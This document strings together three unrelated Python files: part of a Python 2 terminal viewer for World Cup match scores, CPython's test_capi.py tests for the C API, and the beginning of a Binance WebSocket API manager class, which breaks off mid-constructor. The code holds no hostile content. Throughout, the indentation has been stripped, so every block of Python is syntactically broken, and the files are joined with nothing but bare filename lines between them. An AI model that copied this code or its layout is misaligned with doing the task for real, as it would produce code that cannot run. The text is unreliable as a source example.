print Fore.BLUE + '-' * (SCREEN_WIDTH/2 -13) + ' ' + Fore.GREEN + home_ball_possession +' - Ball Possession - ' + away_ball_possession + Fore.BLUE + ' ' + '-' * (SCREEN_WIDTH/2 -13)
if info['status'] != 'in progress':
print 'Match Status:' + Fore.MAGENTA + ' %s' % info['status']
else:
print Fore.GREEN + Style.DIM + u"\U0001f557" + ' %s' % info['time']
if info['datetime']:
start_time = dateutil.parser.parse(info['datetime'])
start_time += timedelta(hours=TIME_DIFFERENCE)
print Fore.MAGENTA + u"\U0001f4c6" + ' %s' % start_time.strftime('%Y-%m-%d'),
print Fore.MAGENTA + u"\U0001f557" + ' %s' % start_time.strftime('%H:%M')
#TODO: print start time and current time.
# Print goals and details.
if info['status'] != 'future':
home_attempts_on_goal = info['home_team_statistics']['attempts_on_goal']
home_on_target = info['home_team_statistics']['on_target']
away_attempts_on_goal = info['away_team_statistics']['attempts_on_goal']
away_on_target = info['away_team_statistics']['on_target']
if not home_attempts_on_goal: home_attempts_on_goal = 0
if not away_attempts_on_goal: away_attempts_on_goal = 0
if not home_on_target: home_on_target = 0
if not away_on_target: away_on_target = 0
output = 'Attempts on goal / On target'
print Fore.BLUE + Style.BRIGHT + ' ' * ((SCREEN_WIDTH/2) - len(output)/2) + output
output = str(home_attempts_on_goal) + ' / ' + str(home_on_target) + ' - ' + str(away_attempts_on_goal) + ' / ' + str(away_on_target)
print Fore.BLUE + Style.BRIGHT + ' ' * (SCREEN_WIDTH/2 - len(output)/2) + output
# Print Yellow cards.
#home_yellow_cards = info['home_team_statistics']['yellow_cards'] if if 'yellow_cards' in info['home_team_statistics'] else '0'
#away_yellow_cards = info['away_team_statistics']['yellow_cards'] if if 'yellow_cards' in info['away_team_statistics'] else '0'
if info['status'] != 'future':
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 -16) + '- ' + SOCCER_BALL + ' Detailed Goals Information -'
#TODO: print details.
goal_events_home = [event for event in info['home_team_events'] if event['type_of_event'] == 'goal' or event['type_of_event'] == 'goal-penalty']
goal_events_away = [event for event in info['away_team_events'] if event['type_of_event'] == 'goal' or event['type_of_event'] == 'goal-penalty']
i_events_home = 0
i_events_away = 0
for home_event, away_event in zip(goal_events_home, goal_events_away):
output = home_event['player'] + ' ' + home_event['time']
print Fore.CYAN + output + ' ' * (SCREEN_WIDTH/2 - len(output)) + u"\U0001f557",
output = away_event['time'] + ' ' + away_event['player']
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 - len(output) -1) + output
i_events_home += 1
i_events_away += 1
while i_events_home < len(goal_events_home):
output = goal_events_home[i_events_home]['player'] + ' ' + goal_events_home[i_events_home]['time']
print Fore.CYAN + output + ' ' * (SCREEN_WIDTH/2 - len(output)) + u"\U0001f557"
i_events_home += 1
while i_events_away < len(goal_events_away):
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2) + u"\U0001f557",
output = goal_events_away[i_events_away]['time'] + ' ' + goal_events_away[i_events_away]['player']
print Fore.CYAN + ' ' * (SCREEN_WIDTH/2 - len(output) -1) + output
i_events_away += 1
print '\n' + ' ' * (SCREEN_WIDTH/2-1) + '···\n'
def get_live_match(lock):
while True:
info = []
try:
info = json.loads(requests.get('http://worldcup.sfg.io/matches/current').text)
#info = json.loads('[{"venue":"St. Petersburg","location":"Saint Petersburg Stadium","status":"in progress","time":"half-time","fifa_id":"300331540","home_team_statistics":{"attempts_on_goal":7,"on_target":1,"off_target":6,"blocked":0,"woodwork":0,"corners":1,"offsides":3,"ball_possession":64,"pass_accuracy":91,"num_passes":359,"passes_completed":325,"distance_covered":52,"balls_recovered":20,"tackles":5,"clearances":3,"yellow_cards":0,"red_cards":0,"fouls_committed":6,"country":"Brazil"},"away_team_statistics":{"attempts_on_goal":3,"on_target":0,"off_target":3,"blocked":0,"woodwork":0,"corners":0,"offsides":2,"ball_possession":36,"pass_accuracy":74,"num_passes":167,"passes_completed":123,"distance_covered":55,"balls_recovered":14,"tackles":6,"clearances":12,"yellow_cards":0,"red_cards":0,"fouls_committed":9,"country":"Costa Rica"},"datetime":"2018-06-22T15:00:00Z","last_event_update_at":null,"last_score_update_at":"2018-06-22T12:55:02Z","home_team":{"country":"Brazil","code":"BRA","goals":0},"away_team":{"country":"Costa Rica","code":"CRC","goals":0},"winner":null,"winner_code":null,"home_team_events":[],"away_team_events":[]}]')
except:
print Fore.RED + 'Ops! I can\'t connect to API =\'('
if not info:
lock.acquire()
clear_screen()
print_art()
print '\n' + Fore.BLACK + Style.BRIGHT + Back.LIGHTWHITE_EX + u"\U0001f4fa" + ' No live match found.'
lock.release()
sleep(90)
continue
lock.acquire()
print_match(info[0], is_live=True)
lock.release()
sleep(UPDATE_TIME)
def interact(lock):
while True:
command = raw_input()
if command == 'today':
todays_matches = []
try:
todays_matches = json.loads(requests.get('http://worldcup.sfg.io/matches/today').text)
#todays_matches = json.loads('[{"venue":"Kazan","location":"Kazan Arena","status":"completed","time":"full-time","fifa_id":"300331496","home_team_statistics":{"attempts_on_goal":5,"on_target":0,"off_target":5,"blocked":0,"woodwork":0,"corners":2,"offsides":2,"ball_possession":30,"pass_accuracy":63,"num_passes":224,"passes_completed":142,"distance_covered":106,"balls_recovered":45,"tackles":16,"clearances":47,"yellow_cards":2,"red_cards":0,"fouls_committed":14,"country":"Iran"},"away_team_statistics":{"attempts_on_goal":17,"on_target":3,"off_target":6,"blocked":8,"woodwork":0,"corners":6,"offsides":1,"ball_possession":70,"pass_accuracy":87,"num_passes":818,"passes_completed":715,"distance_covered":104,"balls_recovered":33,"tackles":4,"clearances":11,"yellow_cards":0,"red_cards":0,"fouls_committed":14,"country":"Spain"},"datetime":"2018-06-20T18:00:00Z","last_event_update_at":"2018-06-20T19:54:18Z","last_score_update_at":"2018-06-20T19:50:29Z","home_team":{"country":"Iran","code":"IRN","goals":0},"away_team":{"country":"Spain","code":"ESP","goals":1},"winner":"Spain","winner_code":"ESP","home_team_events":[{"id":290,"type_of_event":"substitution-out","player":"Ehsan HAJI SAFI","time":"69\'"},{"id":291,"type_of_event":"substitution-in","player":"Milad MOHAMMADI","time":"69\'"},{"id":294,"type_of_event":"substitution-out","player":"Karim ANSARIFARD","time":"74\'"},{"id":295,"type_of_event":"substitution-in","player":"Alireza JAHANBAKHSH","time":"74\'"},{"id":296,"type_of_event":"yellow-card","player":"Vahid AMIRI","time":"79\'"},{"id":299,"type_of_event":"substitution-out","player":"Vahid AMIRI","time":"86\'"},{"id":300,"type_of_event":"substitution-in","player":"Saman GHODDOS","time":"86\'"}],"away_team_events":[{"id":289,"type_of_event":"goal","player":"Diego COSTA","time":"54\'"},{"id":292,"type_of_event":"substitution-out","player":"Andres INIESTA","time":"71\'"},{"id":293,"type_of_event":"substitution-in","player":"KOKE","time":"71\'"},{"id":297,"type_of_event":"substitution-out","player":"Lucas VAZQUEZ","time":"79\'"},{"id":298,"type_of_event":"substitution-in","player":"Marco ASENSIO","time":"79\'"},{"id":301,"type_of_event":"substitution-out","player":"Diego COSTA","time":"89\'"},{"id":302,"type_of_event":"substitution-in","player":"RODRIGO","time":"89\'"}]},{"venue":"Rostov-On-Don","location":"Rostov Arena","status":"completed","time":"full-time","fifa_id":"300331530","home_team_statistics":{"attempts_on_goal":13,"on_target":4,"off_target":6,"blocked":3,"woodwork":0,"corners":3,"offsides":1,"ball_possession":47,"pass_accuracy":86,"num_passes":521,"passes_completed":446,"distance_covered":100,"balls_recovered":43,"tackles":5,"clearances":18,"yellow_cards":0,"red_cards":0,"fouls_committed":10,"country":"Uruguay"},"away_team_statistics":{"attempts_on_goal":8,"on_target":3,"off_target":3,"blocked":2,"woodwork":0,"corners":4,"offsides":2,"ball_possession":53,"pass_accuracy":84,"num_passes":595,"passes_completed":499,"distance_covered":99,"balls_recovered":44,"tackles":11,"clearances":14,"yellow_cards":0,"red_cards":0,"fouls_committed":13,"country":"Saudi Arabia"},"datetime":"2018-06-20T15:00:00Z","last_event_update_at":"2018-06-20T16:53:07Z","last_score_update_at":"2018-06-20T16:52:56Z","home_team":{"country":"Uruguay","code":"URU","goals":1},"away_team":{"country":"Saudi Arabia","code":"KSA","goals":0},"winner":"Uruguay","winner_code":"URU","home_team_events":[{"id":276,"type_of_event":"goal","player":"Luis SUAREZ","time":"23\'"},{"id":279,"type_of_event":"substitution-out","player":"Cristian RODRIGUEZ","time":"59\'"},{"id":280,"type_of_event":"substitution-out","player":"Matias VECINO","time":"59\'"},{"id":281,"type_of_event":"substitution-in","player":"Lucas TORREIRA","time":"59\'"},{"id":282,"type_of_event":"substitution-in","player":"Diego LAXALT","time":"59\'"},{"id":287,"type_of_event":"substitution-out","player":"Carlos SANCHEZ","time":"82\'"},{"id":288,"type_of_event":"substitution-in","player":"Nahitan NANDEZ","time":"82\'"}],"away_team_events":[{"id":277,"type_of_event":"substitution-out","player":"TAISEER ALJASSAM","time":"44\'"},{"id":278,"type_of_event":"substitution-in","player":"HUSSAIN ALMOQAHWI","time":"44\'"},{"id":283,"type_of_event":"substitution-out","player":"HATAN BAHBRI","time":"75\'"},{"id":286,"type_of_event":"substitution-in","player":"MOHAMED KANNO","time":"75\'"},{"id":284,"type_of_event":"substitution-out","player":"FAHAD ALMUWALLAD","time":"78\'"},{"id":285,"type_of_event":"substitution-in","player":"MOHAMMED ALSAHLAWI","time":"78\'"}]},{"venue":"Moscow","location":"Luzhniki Stadium","status":"completed","time":"full-time","fifa_id":"300331511","home_team_statistics":{"attempts_on_goal":10,"on_target":2,"off_target":4,"blocked":4,"woodwork":0,"corners":5,"offsides":1,"ball_possession":46,"pass_accuracy":70,"num_passes":388,"passes_completed":273,"distance_covered":105,"balls_recovered":47,"tackles":12,"clearances":39,"yellow_cards":1,"red_cards":0,"fouls_committed":19,"country":"Portugal"},"away_team_statistics":{"attempts_on_goal":16,"on_target":4,"off_target":10,"blocked":2,"woodwork":0,"corners":7,"offsides":1,"ball_possession":54,"pass_accuracy":75,"num_passes":470,"passes_completed":352,"distance_covered":107,"balls_recovered":65,"tackles":16,"clearances":16,"yellow_cards":1,"red_cards":0,"fouls_committed":23,"country":"Morocco"},"datetime":"2018-06-20T12:00:00Z","last_event_update_at":"2018-06-20T13:55:37Z","last_score_update_at":"2018-06-20T13:55:28Z","home_team":{"country":"Portugal","code":"POR","goals":1},"away_team":{"country":"Morocco","code":"MAR","goals":0},"winner":"Portugal","winner_code":"POR","home_team_events":[{"id":259,"type_of_event":"goal","player":"CRISTIANO RONALDO","time":"4\'"},{"id":261,"type_of_event":"substitution-out","player":"BERNARDO SILVA","time":"59\'"},{"id":262,"type_of_event":"substitution-in","player":"GELSON MARTINS","time":"59\'"},{"id":265,"type_of_event":"substitution-out","player":"JOAO MARIO","time":"70\'"},{"id":266,"type_of_event":"substitution-in","player":"BRUNO FERNANDES","time":"70\'"},{"id":273,"type_of_event":"substitution-out","player":"JOAO MOUTINHO","time":"89\'"},{"id":274,"type_of_event":"substitution-in","player":"ADRIEN SILVA","time":"89\'"},{"id":275,"type_of_event":"yellow-card","player":"ADRIEN SILVA","time":"90\'+2\'"}],"away_team_events":[{"id":260,"type_of_event":"yellow-card","player":"Mehdi BENATIA","time":"40\'"},{"id":263,"type_of_event":"substitution-out","player":"Khalid BOUTAIB","time":"69\'"},{"id":264,"type_of_event":"substitution-in","player":"Ayoub EL KAABI","time":"69\'"},{"id":268,"type_of_event":"substitution-out","player":"Khalid BOUTAIB","time":"70\'"},{"id":269,"type_of_event":"substitution-in","player":"AyoubEL KAABI","time":"70\'"},{"id":267,"type_of_event":"substitution-out","player":"Younes BELHANDA","time":"75\'"},{"id":270,"type_of_event":"substitution-in","player":"Mehdi CARCELA","time":"75\'"},{"id":271,"type_of_event":"substitution-out","player":"Karim EL AHMADI","time":"86\'"},{"id":272,"type_of_event":"substitution-in","player":"Faycal FAJR","time":"86\'"}]}]')
except:
print Fore.RED + 'Ops! I can\'t connect to API =\'('
lock.acquire()
print_many_matches(todays_matches, msg='Today\'s Matches:')
lock.release()
elif command == 'tomorrow':
tomorrow_matches = []
try:
tomorrow_matches = json.loads(requests.get('http://worldcup.sfg.io/matches/tomorrow').text)
except:
print Fore.RED + 'Ops! I can\'t connect to API =\'('
lock.acquire()
print_many_matches(tomorrow_matches, msg='Tomorrow\'s Matches:')
lock.release()
elif command == 'c':
clear_screen()
print_art()
elif command == 'h' or command == 'help':
print_help()
else:
lock.acquire()
print NOT_RECOGNIZE
print_help()
lock.release()
def sigterm_handler(signal, frame):
# save the state here or do whatever you want
sys.exit(0)
if __name__ == '__main__':
# Setup signal handlers.
signal.signal(signal.SIGINT, sigterm_handler)
signal.signal(signal.SIGTERM, sigterm_handler)
# Lock for prints
lock = Lock()
# Init colorama
init(autoreset=True)
clear_screen()
print_art()
Process(target=get_live_match, args=([lock])).start()
interact(lock)
|
test_capi.py | # Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
import os
import pickle
import random
import subprocess
import sys
import time
import unittest
from test import support
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
try:
import threading
except ImportError:
threading = None
# Skip this test if the _testcapi module isn't available.
_testcapi = support.import_module('_testcapi')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_no_FatalError_infinite_loop(self):
with support.suppress_crash_popup():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error:'
b' PyThreadState_Get: no current thread'))
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,[1, 2],5,6,7,8,9,10,11,12,13,14,15,16,17)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestPendingCalls(unittest.TestCase):
def pendingcalls_submit(self, l, n):
def callback():
#this function can be interrupted by thread switching so let's
#use an atomic operation
l.append(None)
for i in range(n):
time.sleep(random.random()*0.02) #0.01 secs on average
#try submitting callback until successful.
#rely on regular interrupt to flush queue if we are
#unsuccessful.
while True:
if _testcapi._pending_threadfunc(callback):
break;
def pendingcalls_wait(self, l, n, context = None):
#now, stick around until l[0] has grown to 10
count = 0;
while len(l) != n:
#this busy loop is where we expect to be interrupted to
#run our callbacks. Note that callbacks are only run on the
#main thread
if False and support.verbose:
print("(%i)"%(len(l),),)
for i in range(1000):
a = i*i
if context and not context.event.is_set():
continue
count += 1
self.assertTrue(count < 10000,
"timeout waiting for %i callbacks, got %i"%(n, len(l)))
if False and support.verbose:
print("(%i)"%(len(l),))
def test_pendingcalls_threaded(self):
#do every callback on a separate thread
n = 32 #total callbacks
threads = []
class foo(object):pass
context = foo()
context.l = []
context.n = 2 #submits per thread
context.nThreads = n // context.n
context.nFinished = 0
context.lock = threading.Lock()
context.event = threading.Event()
for i in range(context.nThreads):
t = threading.Thread(target=self.pendingcalls_thread, args = (context,))
t.start()
threads.append(t)
self.pendingcalls_wait(context.l, n, context)
for t in threads:
t.join()
def pendingcalls_thread(self, context):
try:
self.pendingcalls_submit(context.l, context.n)
finally:
with context.lock:
context.nFinished += 1
nFinished = context.nFinished
if False and support.verbose:
print("finished threads: ", nFinished)
if nFinished == context.nThreads:
context.event.set()
def test_pendingcalls_non_threaded(self):
#again, just using the main thread, likely they will all be dispatched at
#once. It is ok to ask for too many, because we loop until we find a slot.
#the loop can be interrupted to dispatch.
#there are only 32 dispatch slots, so we go for twice that!
l = []
n = 64
self.pendingcalls_submit(l, n)
self.pendingcalls_wait(l, n)
def test_subinterps(self):
import builtins
r, w = os.pipe()
code = """if 1:
import sys, builtins, pickle
with open({:d}, "wb") as f:
pickle.dump(id(sys.modules), f)
pickle.dump(id(builtins), f)
""".format(w)
with open(r, "rb") as f:
ret = _testcapi.run_in_subinterp(code)
self.assertEqual(ret, 0)
self.assertNotEqual(pickle.load(f), id(sys.modules))
self.assertNotEqual(pickle.load(f), id(builtins))
# Bug #6012
class Test6012(unittest.TestCase):
def test(self):
self.assertEqual(_testcapi.argparsing("Hello", "World"), 1)
class EmbeddingTest(unittest.TestCase):
@unittest.skipIf(
sys.platform.startswith('win'),
"test doesn't work under Windows")
def test_subinterps(self):
# XXX only tested under Unix checkouts
basepath = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))
oldcwd = os.getcwd()
# This is needed otherwise we get a fatal error:
# "Py_Initialize: Unable to get the locale encoding
# LookupError: no codec search functions registered: can't find encoding"
os.chdir(basepath)
try:
exe = os.path.join(basepath, "Modules", "_testembed")
if not os.path.exists(exe):
self.skipTest("%r doesn't exist" % exe)
p = subprocess.Popen([exe],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(p.returncode, 0,
"bad returncode %d, stderr is %r" %
(p.returncode, err))
if support.verbose:
print()
print(out.decode('latin1'))
print(err.decode('latin1'))
finally:
os.chdir(oldcwd)
class SkipitemTest(unittest.TestCase):
def test_skipitem(self):
"""
If this test failed, you probably added a new "format unit"
in Python/getargs.c, but neglected to update our poor friend
skipitem() in the same file. (If so, shame on you!)
With a few exceptions**, this function brute-force tests all
printable ASCII*** characters (32 to 126 inclusive) as format units,
checking to see that PyArg_ParseTupleAndKeywords() return consistent
errors both when the unit is attempted to be used and when it is
skipped. If the format unit doesn't exist, we'll get one of two
specific error messages (one for used, one for skipped); if it does
exist we *won't* get that error--we'll get either no error or some
other error. If we get the specific "does not exist" error for one
test and not for the other, there's a mismatch, and the test fails.
** Some format units have special funny semantics and it would
be difficult to accomodate them here. Since these are all
well-established and properly skipped in skipitem() we can
get away with not testing them--this test is really intended
to catch *new* format units.
*** Python C source files must be ASCII. Therefore it's impossible
to have non-ASCII format units.
"""
empty_tuple = ()
tuple_1 = (0,)
dict_b = {'b':1}
keywords = ["a", "b"]
for i in range(32, 127):
c = chr(i)
# skip parentheses, the error reporting is inconsistent about them
# skip 'e', it's always a two-character code
# skip '|' and '$', they don't represent arguments anyway
if c in '()e|$':
continue
# test the format unit when not skipped
format = c + "i"
try:
# (note: the format string must be bytes!)
_testcapi.parse_tuple_and_keywords(tuple_1, dict_b,
format.encode("ascii"), keywords)
when_not_skipped = False
except TypeError as e:
s = "argument 1 must be impossible<bad format char>, not int"
when_not_skipped = (str(e) == s)
except RuntimeError as e:
when_not_skipped = False
# test the format unit when skipped
optional_format = "|" + format
try:
_testcapi.parse_tuple_and_keywords(empty_tuple, dict_b,
optional_format.encode("ascii"), keywords)
when_skipped = False
except RuntimeError as e:
s = "impossible<bad format char>: '{}'".format(format)
when_skipped = (str(e) == s)
message = ("test_skipitem_parity: "
"detected mismatch between convertsimple and skipitem "
"for format unit '{}' ({}), not skipped {}, skipped {}".format(
c, i, when_skipped, when_not_skipped))
self.assertIs(when_skipped, when_not_skipped, message)
def test_parse_tuple_and_keywords(self):
# parse_tuple_and_keywords error handling tests
self.assertRaises(TypeError, _testcapi.parse_tuple_and_keywords,
(), {}, 42, [])
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [''] * 42)
self.assertRaises(ValueError, _testcapi.parse_tuple_and_keywords,
(), {}, b'', [42])
@unittest.skipUnless(threading, 'Threading required for this test.')
class TestThreadState(unittest.TestCase):
@support.reap_threads
def test_thread_state(self):
# some extra thread-state tests driven via _testcapi
def target():
idents = []
def callback():
idents.append(threading.get_ident())
_testcapi._test_thread_state(callback)
a = b = callback
time.sleep(1)
# Check our main thread is in the list exactly 3 times.
self.assertEqual(idents.count(threading.get_ident()), 3,
"Couldn't find main thread correctly in the list")
target()
t = threading.Thread(target=target)
t.start()
t.join()
class Test_testcapi(unittest.TestCase):
def test__testcapi(self):
for name in dir(_testcapi):
if name.startswith('test_'):
test = getattr(_testcapi, name)
test()
if __name__ == "__main__":
unittest.main()
|
unicorn_binance_websocket_api_manager.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: unicorn_binance_websocket_api/unicorn_binance_websocket_api_manager.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api
# Documentation: https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: Oliver Zehentleitner
# https://about.me/oliver-zehentleitner
#
# Copyright (c) 2019-2021, Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from .unicorn_binance_websocket_api_exceptions import StreamRecoveryError, UnknownExchange
from .unicorn_binance_websocket_api_socket import BinanceWebSocketApiSocket
from .unicorn_binance_websocket_api_restclient import BinanceWebSocketApiRestclient
from .unicorn_binance_websocket_api_restserver import BinanceWebSocketApiRestServer
from cheroot import wsgi
from collections import deque
from datetime import datetime
from flask import Flask, redirect
from flask_restful import Api
import asyncio
import colorama
import copy
import logging
import os
import platform
import psutil
import re
import requests
import sys
import threading
import time
import uuid
import ujson as json
import websockets
logger = logging.getLogger(__name__)
class BinanceWebSocketApiManager(threading.Thread):
"""
An unofficial Python API to use the Binance Websocket API`s (com+testnet, com-margin+testnet,
com-isolated_margin+testnet, com-futures+testnet, us, jex, dex/chain+testnet) in a easy, fast, flexible,
robust and fully-featured way.
This library supports two different kind of websocket endpoints:
- CEX (Centralized exchange): binance.com, binance.vision, binance.je, binance.us, trbinance.com, jex.com
- DEX (Decentralized exchange): binance.org
Binance.com websocket API documentation:
- https://github.com/binance-exchange/binance-official-api-docs/blob/master/web-socket-streams.md
- https://binance-docs.github.io/apidocs/futures/en/#user-data-streams
- https://binance-docs.github.io/apidocs/spot/en/#user-data-streams
Binance.vision (Testnet) websocket API documentation:
- https://testnet.binance.vision/
Binance.us websocket API documentation:
- https://github.com/binance-us/binance-official-api-docs/blob/master/web-socket-streams.md
- https://github.com/binance-us/binance-official-api-docs/blob/master/user-data-stream.md
TRBinance.com websocket API documentation:
- https://www.trbinance.com/apidocs/#general-wss-information
Jex.com websocket API documentation:
- https://jexapi.github.io/api-doc/option.html#web-socket-streams
- https://jexapi.github.io/api-doc/option.html#user-data-streams
Binance.org websocket API documentation:
- https://docs.binance.org/api-reference/dex-api/ws-connection.html
:param process_stream_data: Provide a function/method to process the received webstream data. The function
will be called instead of
`add_to_stream_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_buffer>`_
like `process_stream_data(stream_data, stream_buffer_name)` where
`stream_data` cointains the raw_stream_data. If not provided, the raw stream_data will
get stored in the stream_buffer! `How to read from stream_buffer!
<https://oliver-zehentleitner.github.io/unicorn-binance-websocket-api/README.html#and-4-more-lines-to-print-the-receives>`_
:type process_stream_data: function
:param exchange: Select binance.com, binance.com-testnet, binance.com-margin, binance.com-margin-testnet,
binance.com-isolated_margin, binance.com-isolated_margin-testnet, binance.com-futures,
binance.com-futures-testnet, binance.com-coin_futures, binance.us, trbinance.com,
jex.com, binance.org or binance.org-testnet (default: binance.com)
:type exchange: str
:param warn_on_update: set to `False` to disable the update warning
:type warn_on_update: bool
:param throw_exception_if_unrepairable: set to `True` to activate exceptions if a crashed stream is unrepairable
(invalid API key, exceeded subscription limit) or an unknown exchange is
used
:type throw_exception_if_unrepairable: bool
:param restart_timeout: A stream restart must be successful within this time, otherwise a new restart will be
initialized. Default is 6 seconds.
:type restart_timeout: int
:param show_secrets_in_logs: set to True to show secrets like listen_key, api_key or api_secret in log file
(default=False)
:type show_secrets_in_logs: bool
:param output_default: set to "dict" to convert the received raw data to a python dict, set to "UnicornFy" to
convert with `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise
with the default setting "raw_data" the output remains unchanged and gets delivered as
received from the endpoints. Change this for a specific stream with the `output` parameter
of `create_stream()` and `replace_stream()`
:type output_default: str
:param enable_stream_signal_buffer: set to True to enable the
`stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
and receive information about
disconnects and reconnects to manage a restore of the lost data during the
interruption or to recognize your bot got blind.
:type enable_stream_signal_buffer: bool
:param disable_colorama: set to True to disable the use of `colorama <https://pypi.org/project/colorama/>`_
:type disable_colorama: bool
:param stream_buffer_maxlen: Set a max len for the generic `stream_buffer`. This parameter can also be used within
`create_stream()` for a specific `stream_buffer`.
:type stream_buffer_maxlen: int or None
:param process_stream_signals: Provide a function/method to process the received stream signals. The function
will be called instead of
`add_to_stream_signal_buffer() <unicorn_binance_websocket_api.html#unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager.BinanceWebSocketApiManager.add_to_stream_signal_buffer>`_
like `process_stream_data(signal_type=False, stream_id=False, data_record=False)`.
:type process_stream_signals: function
"""
def __init__(self,
process_stream_data=False,
exchange="binance.com",
warn_on_update=True,
throw_exception_if_unrepairable=False,
restart_timeout=6,
show_secrets_in_logs=False,
output_default="raw_data",
enable_stream_signal_buffer=False,
disable_colorama=False,
stream_buffer_maxlen=None,
process_stream_signals=False):
threading.Thread.__init__(self)
self.name = "unicorn-binance-websocket-api"
self.version = "1.34.2.dev"
logger.info(f"New instance of {self.get_user_agent()} on "
f"{str(platform.system())} {str(platform.release())} for exchange {exchange} started ...")
if disable_colorama is not True:
logger.info(f"Initiating `colorama_{colorama.__version__}`")
colorama.init()
logger.info(f"Using `websockets_{websockets.__version__}`")
if process_stream_data is False:
# no special method to process stream data provided, so we use add_to_stream_buffer:
self.process_stream_data = self.add_to_stream_buffer
logger.info(f"Using `stream_buffer`")
else:
# use the provided method to process stream data:
self.process_stream_data = process_stream_data
logger.info(f"Using `process_stream_data`")
if process_stream_signals is False:
# no special method to process stream signals provided, so we use add_to_stream_signal_buffer:
self.process_stream_signals = self.add_to_stream_signal_buffer
logger.info(f"Using `stream_signal_buffer`")
else:
# use the provided method to process stream signals:
self.process_stream_signals = process_stream_signals
logger.info(f"Using `process_stream_signals` ...")
self.exchange = exchange
if self.exchange == "binance.com":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-testnet":
self.websocket_base_uri = "wss://testnet.binance.vision/"
self.max_subscriptions_per_stream = 1024
elif self.exchange == "binance.com-margin":
self.websocket_base_uri = "wss://stream.binance.com:9443/"
self.max_subscriptions_per_stream = 1024
